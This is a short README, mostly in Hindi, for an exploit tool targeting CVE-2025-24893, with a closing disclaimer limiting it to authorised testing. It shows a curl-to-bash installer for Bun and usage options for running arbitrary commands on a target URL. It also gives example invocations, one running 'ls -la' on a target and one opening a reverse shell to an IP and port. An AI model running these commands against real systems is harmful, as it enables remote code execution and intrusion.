
bun स्थापित करें:
curl -fsSL https://bun.com/install | bash
निर्भरताएँ स्थापित करने के लिए:
bun install
चलाने के लिए:
bun run CVE-2025-24893.ts
यह प्रोजेक्ट bun init का उपयोग करके bun v1.2.19 में बनाया गया था। Bun एक तेज़ ऑल-इन-वन जावास्क्रिप्ट रनटाइम है।
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
यह एक्सप्लॉइट और गाइड केवल शैक्षिक उद्देश्यों के लिए हैं। इस जानकारी का उपयोग जिम्मेदारी से और केवल उन्हीं सिस्टमों पर करें जिन्हें परीक्षण करने की आपके पास स्पष्ट अनुमति हो। सिस्टमों का अनधिकृत शोषण अवैध और अनैतिक है। लेखक और योगदानकर्ता इस जानकारी के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं हैं।